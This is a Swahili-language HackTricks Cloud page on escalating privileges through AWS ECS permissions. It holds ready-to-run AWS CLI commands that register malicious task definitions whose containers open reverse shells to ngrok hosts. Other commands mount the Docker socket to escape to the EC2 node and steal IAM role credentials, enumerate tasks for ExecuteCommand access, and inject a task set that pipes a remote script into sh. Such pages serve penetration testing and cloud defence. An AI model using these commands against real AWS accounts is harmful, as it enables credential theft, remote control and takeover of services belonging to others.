Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - ECS Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

ECS

Maelezo zaidi kuhusu ECS inapatikana:

pageAWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

Mshambuliaji anayetumia ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, na ecs:RunTask katika ECS anaweza kuunda ufafanuzi mpya wa kazi na kontena la hila linaloiba siri za metadata na kulitekeleza.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Athari Inayowezekana: Privesc moja kwa moja kwa jukumu tofauti la ECS.

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

Kama ilivyokuwa kwenye mfano uliopita, mshambuliaji anayetumia iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask ruhusa katika ECS inaweza kuunda ufafanuzi mpya wa kazi na kontena la madhara ambalo huchukua siri za metadata na kulitekeleza. Hata hivyo, katika kesi hii, lazima kuwe na kipande cha kontena ili kutekeleza ufafanuzi wa kazi wenye nia mbaya.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Athari Inayowezekana: Privesc moja kwa moja kwa jukumu lolote la ECS.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

Kama ilivyokuwa kwenye mfano uliopita, mshambuliaji anayetumia iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService au ecs:CreateService ruhusa katika ECS inaweza kuunda ufafanuzi mpya wa kazi na kontena la madhara ambalo linajiweka kama mwenyeji wa siri na kulitekeleza kwa kuunda huduma mpya na angalau kazi 1 ikiendesha.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Matokeo Yanayowezekana: Privesc moja kwa moja kwa jukumu lolote la ECS.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Hali hii ni kama zile zilizotangulia lakini bila ruhusa ya iam:PassRole. Hii bado ni ya kuvutia kwa sababu ikiwa unaweza kuendesha kontena lolote, hata kama ni bila jukumu, unaweza kuendesha kontena lenye mamlaka ya kutoroka kwenye nodi na kuiba jukumu la IAM la EC2 na majukumu mengine ya kontena za ECS zinazoendeshwa kwenye nodi. Unaweza hata kuwalazimisha majukumu mengine kuendeshwa ndani ya kifaa cha EC2 ulichohatarisha ili kuiba vitambulisho vyao (kama ilivyozungumziwa katika Sehemu ya Privesc kwa nodi).

Shambulio hili linawezekana tu ikiwa kikundi cha ECS kinatumia EC2 na sio Fargate.

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Mshambuliaji mwenye ecs:ExecuteCommand, ecs:DescribeTasks anaweza kutekeleza amri ndani ya kontena linaloendeshwa na kuchukua jukumu la IAM lililounganishwa nalo (unahitaji ruhusa za maelezo kwa sababu ni muhimu kutekeleza aws ecs execute-command). Hata hivyo, ili kufanya hivyo, kifaa cha kontena kinahitaji kuwa kinaendesha mawakala wa ExecuteCommand (ambao kwa chaguo-msingi hawapo).

Kwa hivyo, mshambuliaji anaweza kujaribu:

  • Jaribu kutekeleza amri katika kila kontena linaloendeshwa

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"

  • Ikiwa ana ecs:RunTask, endesha kazi na aws ecs run-task --enable-execute-command [...]

  • Ikiwa ana ecs:StartTask, endesha kazi na aws ecs start-task --enable-execute-command [...]

  • Ikiwa ana ecs:CreateService, unda huduma na aws ecs create-service --enable-execute-command [...]

  • Ikiwa ana ecs:UpdateService, sasisha huduma na aws ecs update-service --enable-execute-command [...]

Unaweza kupata mifano ya chaguo hizo katika sehemu za awali za ECS privesc.

Athari Inayowezekana: Privesc hadi kwa jukumu tofauti lililofungwa kwa vyombo.

ssm:StartSession

Angalia katika ukurasa wa privesc wa ssm jinsi unavyoweza kutumia idhini hii kwa privesc hadi ECS:

pageAWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Angalia katika ukurasa wa privesc wa ec2 jinsi unavyoweza kutumia idhini hizi kwa privesc hadi ECS:

pageAWS - EC2 Privesc

?ecs:RegisterContainerInstance

TODO: Je, ni posible kusajili kifaa kutoka kwa akaunti tofauti ya AWS ili kazi zitekelezwe chini ya mashine zinazodhibitiwa na mshambuliaji??

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

TODO: Jaribu hili

Mshambuliaji mwenye idhini ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, na ecs:DescribeTaskSets anaweza kuunda seti ya kazi yenye nia mbaya kwa huduma ya ECS iliyopo na kusasisha seti kuu ya kazi. Hii inaruhusu mshambuliaji kutekeleza nambari ya kupendelea ndani ya huduma.

bashCopy code# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Athari Inayowezekana: Tekeleza nambari za kiholela katika huduma iliyohusika, ikileta athari kwenye utendaji wake au kuvuja kwa data nyeti.

Marejeo

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - ECR PrivescNextAWS - EFS Privesc

Last updated